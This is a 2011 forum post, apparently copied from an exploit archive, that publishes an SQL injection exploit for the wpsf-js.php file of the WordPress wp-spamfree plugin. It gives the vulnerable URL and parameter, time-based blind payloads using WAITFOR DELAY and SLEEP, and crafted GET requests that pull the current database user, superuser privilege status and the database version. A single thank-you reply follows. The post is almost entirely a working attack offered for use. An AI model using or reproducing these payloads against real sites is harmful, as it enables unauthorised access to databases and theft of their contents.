Guest expl0iter Posted October 16, 2011 Report Share Posted October 16, 2011 #Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]#Date: 2011-10-16#Author: [longrifle0x]#Version:[3.2.1]#Tested on:[linux]#Used: ["sqlmap"]#SQL Injectionhttp://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)#[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)# 1337day.com [2011-10-16] Quote Link to comment Share on other sites More sharing options...
Gonzalez Posted October 19, 2011 Report Share Posted October 19, 2011 Thanks.-Gonzalez Quote Link to comment Share on other sites More sharing options...